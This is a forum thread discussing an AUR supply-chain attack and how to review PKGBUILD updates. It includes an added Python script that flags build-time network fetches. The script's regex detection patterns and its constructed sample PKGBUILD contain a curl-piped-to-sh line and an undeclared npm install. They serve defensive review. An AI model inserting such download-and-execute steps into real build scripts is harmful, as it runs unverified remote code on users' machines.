Also, an ad blocker.
With the old package managers safety was simple… trust the developers, use their packages. 10000 downloads? Easy! 1 download… 🤔 Maybe skip for now.
Now with executables like Mac and Windows it’s easier to sneak something in. You still rely on trust. But now you’ve got AI in the game muddying the waters.
So… rkhunter?
I don’t use Arch, BTW. So the biggest NPM threat vector on my machine is still VSCode.
I’m trying out Zed
I was anti-GUI for years, having learnt to program on a tiny green and black 40x24 CRT on my old MSX back in the 80s. I remember being made fun of by fellow students and co-workers alike for doing almost everything in the terminal. This included huge projects with complex file trees and lots of files.
But as time went on, I started to appreciate the GUI more and more. And these days I’m all for using a GUI for a lot of things.
Especially in IDEs that can do a lot of things with short keyboard shortcuts. I now have multiple monitors, including a large 32" primary. I always have stacks upon stacks of windows open and manage them efficiently. There’s always at least a couple of terminals hanging out and of course most IDEs also have terminal windows baked in. But all of the extra visual tools help me out a lot.
Almost the exact opposite for me. Used to hog GUIs and hated keyboard shortcuts with a passion, but then I came across Niri, fell in love with the idea, and the whole scrolling window manager thing made my productivity explode. I can’t use traditional desktop environments anymore. Tried to go back and literally can’t.
Tmux wasn’t that far behind.
I’m a longtime vim user and I use nvim+lazyvim for all my personal stuff these days, but I have to use enterprise managed VS or VSCode for work.
Microslop is nervous now that Linux is popular enough to attack.
Linux has always been the bigger target. Even microslop uses Linux for its servers.
I’m gonna assume that their servers are not installing stuff from AUR though
I would hope so too
Linux Users: haha those silly windows users, always searching the web for their software and getting viruses.
Linux Users: oh no I got malware by searching the AUR! Don’t worry, I found a package on npm to help!
The AUR is still safer. One, it is at least minimally moderated. If a malicious package is detected, it can be reported and removed. Two, the installer is usually not just a black box executable. Three, most of the build and runtime dependencies are from the official Arch repos, which provides some protection against supply chain attacks. For Windows installers, you have to trust the distributor to bundle clean DLLs (for that matter, the same applies to AppImages).
But if it starts downloading anything from NPM… ^C and run.
The most unsafe factor of the AUR is AUR helpers and their goal to dumb everything down and streamline the process as if the AUR were an official repo.
I’m not entirely sure I agree, I think the issue is with default settings.
Like you could use both yay and paru to diff the PKGBUILD of the most recent update and then read it, and then approve each. And I think that’s pretty helpful. But you could also just blindly accept the update with the right config or flag and that is not a good practice.
Ye my reaction to this was basically uninstalling yay to force me to do it manually
appimages are kinda like portable app versions.
By misusing the AUR and ignoring every warning telling you to read and understand the pkgbuild or don’t do it.
Everyone knows if you use Kali you’re immune to malware
btw, I use malware
Never trust an NPM library
bu-but so many libraries need funding!
Fuck node
Me!!!
But I’m actually safe: Last month I fried half of my BTRFS array, and decided that instead of recovering the system, I’d rather copy over the relevant data and reinstall Arch from scratch. In doing so, I’ve shed the majority of AUR packages that my old system had. Of the handful of AUR packages on my new system, none were attacked.
I avoid ~~orphaned~~ unmaintained packages and I wait a few days before I type yay
They also wait until they get off the rollercoaster and back on solid ground before yelling yay!
Is there a flag to prevent orphaned packages from installing?
Good question, I guess I might be using the wrong word when I say “orphan” because I see the Arch wiki uses that term differently.
Orphans are packages that were installed as a dependency and are no longer required by any package.
You can remove these manually or if using an aur helper like yay there are flags/settings you can use to delete them after the desired package was installed.
However, what I was talking about was AUR packages that are unmaintained or do not have a maintainer anymore.
I’m researching more at the moment.
shit, I had 150 orphaned packages
pacman -Qdtq | pacman -Rns -
I made an alias for this, but IMO this cleanup should be automatic. The user didn’t install it themselves after all.
This can be prevented by uninstalling with -Rs
Just removing them without user intervention could cause unexpected behavior.
You’re no fun
Waiting for updating doesn’t make any difference. The packages could be infected at any point.
> The packages could be infected at any point.
I guess the same could be said for literally any open source or freely distributed project.
The difference is that this was a supply chain attack and, to my knowledge, required the package to be listed as ~~orphaned~~ unmaintained first so that the PKGBUILD could be modified to install malicious NPM packages.
The community caught it quickly because it is possible to read both the PKGBUILD and the output of the update and, I think, it is fully resolved as of now.
Basically, if one were to delete or replace orphaned packages then they wouldn’t have been infected.
It is also possible to add a CVE scanner for AUR packages if reading the PKGBUILD is too much, I’m looking into how to do that now.
All this is to say that you should check if you had an infected package but I personally don’t think using the aur is more risky than using a flatpak.
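The advice in the thread is to read the PKGBUILD diff before approving an update, because the attack worked by editing a PKGBUILD so that its build steps pulled in npm packages that were never declared in source=(). That review can be partly automated. The script below is an added example, not code from the thread, from yay/paru or from any Arch project: it walks the prepare()/build()/check()/package() functions of a PKGBUILD and flags build-time network fetches (npm/pip/git/curl/wget) and download-piped-to-shell lines, which makepkg's checksum handling never covers. The sample PKGBUILD, its package name and its URLs are constructed for the demonstration.

```python
"""Flag build-time network fetches in a PKGBUILD before approving an AUR update.

makepkg verifies only the files listed in source=() against sha256sums=();
anything a function fetches on its own (npm install, curl | sh, ...) is
unverified code executed on your machine. This helper lists such lines so
a reviewer can look at them first. It is a triage aid, not a full parser.
"""
import re

# Commands that pull code from the network inside a build function.
NETWORK_FETCH = re.compile(
    r"\b(curl|wget|npm\s+(?:i|install|ci)|npx|pip3?\s+install"
    r"|git\s+clone|yarn\s+(?:add|install)|cargo\s+install)\b"
)
# A download piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba)?sh\b")
# Decoding an embedded blob and running it is a common obfuscation marker.
OBFUSCATION = re.compile(r"\b(base64\s+(-d|--decode)|eval\s+)")

# Start of one of the makepkg-invoked functions, e.g. "build() {" or "package_foo()".
FUNC_START = re.compile(r"^\s*(prepare|build|check|package(?:_\S+)?)\s*\(\)\s*\{?\s*$")


def extract_functions(pkgbuild: str) -> dict[str, list[tuple[int, str]]]:
    """Return {function_name: [(line_number, line), ...]} for the build functions.

    Brace depth is tracked so nested blocks (if/for) stay inside their function;
    ${var} expansions are balanced and therefore do not disturb the count.
    """
    funcs: dict[str, list[tuple[int, str]]] = {}
    current = None
    depth = 0
    for n, line in enumerate(pkgbuild.splitlines(), 1):
        if current is None:
            m = FUNC_START.match(line)
            if m:
                current = m.group(1)
                funcs[current] = []
                depth = line.count("{") - line.count("}")
            continue
        depth += line.count("{") - line.count("}")
        if depth <= 0:          # closing brace of the function
            current = None
            continue
        funcs[current].append((n, line))
    return funcs


def find_findings(pkgbuild: str) -> list[dict]:
    """Scan every build function and return the lines a reviewer should read."""
    findings = []
    for func, lines in extract_functions(pkgbuild).items():
        for n, line in lines:
            code = line.split("#", 1)[0]          # drop trailing shell comments
            if PIPE_TO_SHELL.search(code):
                kind = "pipe-to-shell"
            elif OBFUSCATION.search(code):
                kind = "obfuscation"
            elif NETWORK_FETCH.search(code):
                kind = "network-fetch"
            else:
                continue
            findings.append({"line": n, "func": func, "kind": kind, "text": line.strip()})
    return findings


# Constructed sample PKGBUILD (hypothetical package and URLs) with two
# injected lines of the kind the thread describes.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
pkgrel=2
source=("https://example.invalid/example-tool-${pkgver}.tar.gz")
sha256sums=('SKIP')

prepare() {
  cd "${pkgname}-${pkgver}"
  patch -p1 < "${srcdir}/fix.patch"
}

build() {
  cd "${pkgname}-${pkgver}"
  make
  npm install some-helper   # not in source=(), fetched at build time
}

package() {
  cd "${pkgname}-${pkgver}"
  make DESTDIR="${pkgdir}" install
  curl -s https://example.invalid/post-install.sh | sh
}
"""

if __name__ == "__main__":
    for f in find_findings(SAMPLE_PKGBUILD):
        print(f"line {f['line']:>3} [{f['func']}] {f['kind']}: {f['text']}")
```

To use it on a real update, feed the PKGBUILD that yay or paru shows in its diff step (or read it from the cloned AUR directory) instead of the constructed sample; a clean PKGBUILD produces no findings, and anything listed is a line worth reading by hand before approving.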
> Waiting for updating doesn’t make any difference.
Are Linux users allowed to just lie like that? I thought if you do that you need to use Windows.
What?
C’mon, man, at least pour one out for the homies who waited to update and landed in the period where it was live and undisclosed.
Inverted security by obscurity
Obscurity by security?
Sescurity by Obcurity
Obituary by Sorcery
I’ve been looking for an antivirus since I want to be able to download random stuff from the internet without having to review it.
Clamav is pretty good if all you’re wanting to do is scan the files you’ve downloaded so that you’re not potentially re-transmitting viruses.
Outside of that, maybe consider using SELinux for security, or possibly if you’re going to be doing risky downloads, do it on a virtual machine, on a virtual network.
Doesn’t work like this.